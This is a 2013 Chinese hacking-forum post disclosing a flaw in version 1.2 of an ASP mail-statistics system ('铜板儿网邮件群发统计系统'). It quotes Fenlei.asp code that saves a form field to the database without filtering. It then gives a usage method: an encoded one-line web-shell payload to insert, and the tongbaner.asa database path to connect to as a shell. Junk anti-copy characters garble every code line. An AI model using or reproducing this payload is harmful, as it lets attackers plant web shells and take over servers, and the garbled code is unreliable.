找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1978|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp
, _' a' v* k$ h! y& A) s) _* Q7 p' P* s
IF Request.QueryString("Action")="del" Then
, h! \; K$ a& ^3 ?2 RID=Request.QueryString("ID")
* M( f/ `* R/ K$ `* EIF Countss ("tui","Fenlei",ID )<>0 then
$ I2 q. w. z& B, v8 [& ^'略 . m# y  V. N: k  J5 s1 ?; I
IF Request.QueryString("Action")="Add" Then , B( G( j6 j2 G+ }) e' v
Tname=Request.Form("Typename")
' }6 `' j) b+ D/ |8 ZSet Rs=Server.CreateObject("adodb.Recordset") 1 X- X: F: f+ @, I
Sql="Select * From Fenlei Order by id Desc " 3 Y# P- h* ^! x7 _
Rs.Open Sql,Conn,1,3
; w7 z& c  n( ?8 K' \Rs.Addnew . z, p6 h9 Y1 {; G
Rs("Typename")=Tname
7 N: Y5 X# Y; s/ S  i'略 5 E9 g! x0 y  F) o
Set Rs=Server.CreateObject("adodb.Recordset") + z: V* J4 ^. a5 x& s% l6 B
Sql="Select * From Fenlei Order by id Desc "
9 @8 L0 p6 H$ a% O& ORs.Open Sql,Conn,1,1
$ @+ m$ [5 H6 p* ^8 R'略
3 y5 A" }, d4 Z2 f8 d. y%>1 d- i7 k( D( I( U2 L
# T) N5 o; }1 F) x7 Q

; f4 O2 ]( a- F; Y( W 0 J& Y+ x0 Y& E8 Y$ C, z- w
没有过滤,直接写入数据库。7 a2 K% f0 p  y! S- g; u; R4 J
3 P0 H9 B  X% N" f3 X& A
利用方法:
- n0 J6 v2 j0 C8 r4 R3 H
2 u9 j; a9 u# p9 |3 Z5 x  ^% z插入:┼攠數畣整爠煥敵瑳∨≡┩>
+ n# c% Q, P) Q8 c7 ]8 T
8 O* R0 }* {# |  q+ P ' D5 e# x. ~3 R2 @) o; n1 C3 M! l* e- @
连接: http://www.xxx.com/###tongbaner.asa - S- ~" }4 b' [% z7 n8 ^
'默认安装文件: 3 f8 ~# J& ?+ P0 H
'install.asp8 C1 A4 z. C/ J6 c( P6 e! `
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表